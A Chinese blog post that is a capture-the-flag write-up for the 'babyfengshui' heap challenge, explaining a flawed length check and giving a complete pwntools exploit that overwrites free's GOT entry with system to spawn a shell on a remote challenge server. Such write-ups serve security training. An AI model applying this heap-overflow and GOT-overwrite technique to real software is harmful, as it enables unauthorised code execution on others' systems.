babyfengshui(xctf)

最新推荐文章于 2023-03-15 22:50:00 发布
最新推荐文章于 2023-03-15 22:50:00 发布
阅读量220 收藏 1
点赞数 1
分类专栏: # xctf(pwn高手区) CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43868725/article/details/108149660
版权

0x0 程序保护和流程

保护:

protect

流程:

main()

main

add_user()

add_user

连续分配了两个堆块,并将第一次分配的堆块的指针存入第二次分配的堆块的fd字段,bk字段开始存放name,之后调用了update_user()

update_user

输入完length之后要经过判断,需要第一次分配的堆块的数据段的地址加上输入的长度的值必须小于第二次分配的堆块的数据段的地址减4的值才能输入text。

delete_user()

delete_user

根据索引分别释放两个堆块,再将指向第二次分配堆块的指针清零。

display_user()

display_user

根据索引输出之前输入的数据。

0x1 利用过程

1.这个程序乍一看好像没有问题,每个函数的限制条件也没什么问题,指向释放之后的堆块的指针也请零了。再次看向update_user()的判定中存在逻辑问题,再进行大小判断的时候是根据地址的大小判断的,基于这个判断的前提是两次分配的堆块是相邻的。但是经过大小不同的分配和释放就会造成分配的两个堆块不是相邻的,这样就会导致堆溢出的发生。

2.在add_user()中第一次分配的堆块的大小是可控的,第二个堆块的大小固定是0x80这个堆块释放之后会进入unsorted bin。如果将第一次分配的堆块的大小限制在fast bin中,再利用索引删除这两个堆块,一个进入fast bin,一个进入unsorted bin。再次分配时只要将可控大小的堆块申请分配的数值不属于之前的fast bin就会从unsorted bin中切割,这样的话就会导致再次分配的固定大小的堆块的地址比较大,就会导致栈溢出了。如果在这中间还有类似的堆块的话,就可以控制指针,泄露地址,然后getshell了。

3.通过上述分析,可以确定具体思路,构造堆溢出,通过free函数的got表泄露free函数的地址,计算出system函数的地址,修改free函数的got表中的数据为system函数的地址,释放预先填入’/bin/sh\x00’的堆块进行getshell 。

构造堆溢出。再次分配堆块时,如果实际分配的大小与索引为0实际分配的大小不一致就会造成溢出。

addUser(0x10,'name0','a'*5)
addUser(0x10,'name1','b'*5)
addUser(0x20,'name2','/bin/sh\x00')
deleteUser(0)

利用溢出将索引为1的堆块指向text的指针覆盖为free函数的got表地址。

addUser(0x30,'name3','c'*0xA0+p32(free_got))

利用display_user()泄露free函数的地址,并计算system函数的地址。(题目给出的libc有问题)

displayUser(1)
sh.recvuntil('description: ')
free_addr=u32(sh.recv(4))
if local:
    libc_base=free_addr-free_libc
    system_addr=libc_base+system_libc
else:
    libc=LibcSearcher('free', free_addr)
    libc_base=free_addr-libc.dump('free')
    system_addr=libc_base+libc.dump('system')

利用update_user()将free函数的got表中的数据改为system函数的地址。

updateUser(1,p32(system_addr))

现在调用free函数就相当于调用system函数,因为在索引为2的堆块的text中写入了’/bin/sh\x00’所以此时调用free函数就可以getshell了。

deleteUser(2)
sh.interactive()

0x2 exp

from pwn import *
from LibcSearcher import *
context.log_level = 'debug'
local=0
if local:
    sh=process('./a')
    libc=ELF('/lib/i386-linux-gnu/libc.so.6')
else:
    sh=remote('220.249.52.133','54195')

elf=ELF('./a')
free_got=elf.got['free']

free_libc=libc.symbols['free']
system_libc=libc.symbols['system']

def addUser(size,name,text):
    sh.sendlineafter('Action: ','0')
    sh.sendlineafter('size of description: ',str(size))
    sh.sendlineafter('name: ',name)
    sh.sendlineafter('text length: ',str(len(text)))
    sh.sendlineafter('text: ',text)

def deleteUser(index):
    sh.sendlineafter('Action: ','1')
    sh.sendlineafter('index: ',str(index))

def displayUser(index):
    sh.sendlineafter('Action: ','2')
    sh.sendlineafter('index: ',str(index))

def updateUser(index,text):
    sh.sendlineafter('Action: ','3')
    sh.sendlineafter('index: ',str(index))
    sh.sendlineafter('text length: ',str(len(text)))
    sh.sendafter('text: ',text)

def exit():
    sh.sendlineafter('Action: ','4')

addUser(0x10,'name0','a'*5)
addUser(0x10,'name1','b'*5)
addUser(0x20,'name2','/bin/sh\x00')
deleteUser(0)
addUser(0x30,'name3','c'*0xA0+p32(free_got))
displayUser(1)
sh.recvuntil('description: ')
free_addr=u32(sh.recv(4))
if local:
    libc_base=free_addr-free_libc
    system_addr=libc_base+system_libc
else:
    libc=LibcSearcher('free', free_addr)
    libc_base=free_addr-libc.dump('free')
    system_addr=libc_base+libc.dump('system')

updateUser(1,p32(system_addr))
deleteUser(2)
sh.interactive()
whiteh4nd
关注
专栏目录
XCTF mfc逆向-200
12-22
查壳 vmp。。。 看了大佬博客后得知解法 这是一个MFC程序,但我不会。。。...但是我知道mfc的程序应该都是一个个控件组成 ...发现这两个东西,第一个是窗口类名,第二个我也不晓得是啥,但是它比前面和后面的少了一个消息...
babyfengshui 堆溢出的入门题
qq_41071646的博客
02-11 1726
本文 参考资料 https://github.com/firmianay/CTF-All-In-One 感谢 作者的 无私奉献 若是侵权 请联系 本人 本人会修改或删除 这道题 其实我也是看这篇文章才撸会的 怎么说呢 这个题 本来 我也是有点迷糊的 补了一些 堆溢出的资料 就懂了许多 这里我是结合资料 来写的 本人也是一个菜虾 要是哪里不对 还请指教 ...
攻防世界PWN之Babyfengshui题解
seaaseesa的博客
11-06 1024
本题,首先,为了方便调试,我们需要解决alarm clock问题 程序运行几十秒后就会自动退出,所以,为了方便调试,我们需要先修改一下这个二进制 我们用十六进制编辑器把这几个指令nop(0x90)掉即可 然后,我们就开始做题了 查看创建功能的函数 这里创建了两个堆,第一个堆用来存储description,第二个堆用来存储第一个堆的指针以及name字符串 其数据...
babyfengshui [XCTF-PWN][高手进阶区]CTF writeup攻防世界题解系列23
重新启程
12-26 854
题目地址:babyfengshui 这个题目是高手进阶区的第12题。本题的主要考点是堆溢出,现在ctf主要的考点都已经转移到了堆溢出了,这个题目作为堆溢出的基础题目,还是很容易入门的。 先看看题目 惯例检查一下保护机制: [*] '/ctf/work/python/babyfengshui/babyfengshui' Arch: i386-32-little RE...
【buu】babyfengshui_33c3_2016(详细题解)
qq_62068476的博客
03-15 452
buu日常一题
攻防世界babyfengshui解题思路
aptx4869_li的博客
02-02 275
解题思路 基本信息查询 healer@healer:~/Documents/CTF/PWN/babyfengshui$ readelf -h babyfengshui ELF Header: Magic: 7f 45 4c 46 01 01 01 00 00 00 00 00 00 00 00 00 Class: ELF32 Data: 2's complement, litt
圣徒xctf网站
02-14
圣徒xctf网站概述SaintsXCTF Web应用程序的前端。 这是SaintsXCTF Web应用程序的第二个版本。 前端使用React.js编写,并使用Sass进行样式设置。 API调用通过Nginx代理路由到 。指令在本地启动应用程序首次设置应该...
XMan-MISC-诸葛建伟XCTF-public.pdf
12-04
MISC,中文即杂项,包括隐写,数据还原,脑洞、社会工程、与信息安全相关的大数据等。 竞赛过程中解MISC时会涉及到各种脑洞,各种花式技巧,主要考察选手的快速理解、学习能力以及日常知识积累的广度、深度。...
writeup:xctf撰写
03-28
写上去xctf撰写
babyfengshui__BUUCTF
Jc
09-29 606
其实这个题用了两天,第一天拿上题的时候比较浮躁,也没什么分析的效果,把题做出来了,写个文章大家分析交流 我看网上大家都说这个题适合入门堆得看,其实我感觉要是没接触过堆得话,理解起来还是比较困难的,我会将自己做题的思路记录下来,让大家少踩点坑 做题思路 1.查看安全机制/文件信息 2.分析IDA,梳理思路很重要 3.分析构造漏洞利用(其实自己都是一步步来的,毕竟还是个小白呢) 4.编写EXP文件 安...
babyfengshui_33c3_2016中提升抽象能力
Probeginner的博客
07-01 133
堆学习,写功能,修改被写地址
babyfengshui 堆溢出简单利用
qq_42728977的博客
04-04 242
题目:babyfengshui 难度:** 漏洞利用:堆溢出 环境:ubuntu16.04 pwntools LibcSearcher 参考链接:传送1 利用思路: 这道题之前做过。最近刷题老刷栈溢出,感觉很没意思,就找了堆的题练练手,不然没什么进步。 菜单题。 一个个选项分析,发现再update里面有问题 这句话就是说,length+&description不能超过结构体struct...
[XCTF-pwn] 27_babyfengshui
weixin_52640415的博客
03-09 371
输入长度判断错误。可写溢出。 数据结构: 管理块0x80: char *data_ptr; name[0x7c] 先写数据块再写管理块 unsigned int __cdecl read_text(unsigned __int8 a1) { char v2; // [esp+17h] [ebp-11h] BYREF int v3; // [esp+18h] [ebp-10h] BYREF unsigned int v4; // [esp+1Ch] [e...
(攻防世界)(pwn)babyfengshui
PLpa的博客
08-03 1322
入门级的堆题,拿来学习还是不错的。 做这道题之前,最好还是先对堆的数据结构有一定的了解。 拿到题目,下载附件,查看保护。 一个32位的程序,开了NX和Canary保护,这都不是重头戏毕竟这题不用栈,栈保护只是锦上添花罢了。 把文件拖进IDA查看逻辑: 可以看到,典型的菜单题,这很pwn,实现了增删改查四个功能,像极了C语言程序设计的期末结业程序设计题哈哈哈,暴露年龄。 进入增加用户功能: 可...
babyfengshui_33c3_2016题解
coco的博客
12-09 923
这道题还是比较基础的堆题,泄漏libc和get shell都比较基础。需要注意的是以下几点: 输入长度限制的绕过方法值得学习一下。 泄漏libc时将free got表中写入puts.plt是不可行的,因为这道题的输入结束时候会带上\x00,这样就会破坏free got表的下一项fgets got,导致程序运行失败。 我最后本机上运行成功,但是远程打不通,后来经过发现是因为libc的版本不一样,导...
babyfengshui_33c3_2016[堆溢出]
、moddemod
06-26 368
未来的你 = 你的热情 + 你的努力 + 那么微不足道的天赋 其实做pwn题我感觉都是只可意会,但并非不可言传,只是说了感觉和说废话一样,没有什么实质性的作用,最最重要的是要自己多去操作调试,pwn多了也就那样吧!但是最核心的永远是你coding的能力!虽然在干着逆向的事,但是coding的能力决定了你的高度! ----小白感悟 这道题问题出现在更新的时候边界的判断方法有问题,结合的堆的机制,就可以形成堆溢出! 添加一个用户会申请两个chunk,后一个chunk的内容为.
多校B题Baby Bites
weixin_43331783的博客
03-13 209
简单模拟读懂题就好了 一开始忘记转换多位数了wa了一下 #include<iostream> #include<stdio.h> #include<cstring> using namespace std; char a[10]; int change(char a[]) { int n=strlen(a); int ret=0;for(int ...
一道简单的入门pwn题
m1785717的博客
09-07 9811
这是一道入门的pwn题 链接:https://pan.baidu.com/s/1vltSv8tJYrqKw8vATxwNYA 密码:f0qy 拿到题先用file命令查看一下文件信息 可以看到是32-bit 的elf文件,用32位的IDA打开。 首先进入main函数,F5反编译后分析代码 定位到输入的参数&s,可以看到参数s分配的空间。这一题通过覆盖的方式执行_system...
xctf攻防世界pwn level0
你的小粉丝的博客
07-24 1506
答主也是个小白,学长告诉我要用脚本,我也不会写,用的别人写好的脚本 from pwn import * p= remote(‘111.198.29.45’,33907) elf=ELF(’./level0’) sysaddr=elf.symbols[‘callsystem’] payload=‘a’*(0x80+8)?+p64(sysaddr) p.recv() p.send(payload) p...
xctf supersqli
最新发布
09-01
对于 xctf supersqli,它是一个供参与者练习 SQL 注入技巧的 CTF(Capture The Flag)比赛题目。CTF比赛是一种网络安全竞赛,旨在测试参与者在各种安全领域的技能。在 xctf supersqli 中,参与者需要利用 SQL 注入...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值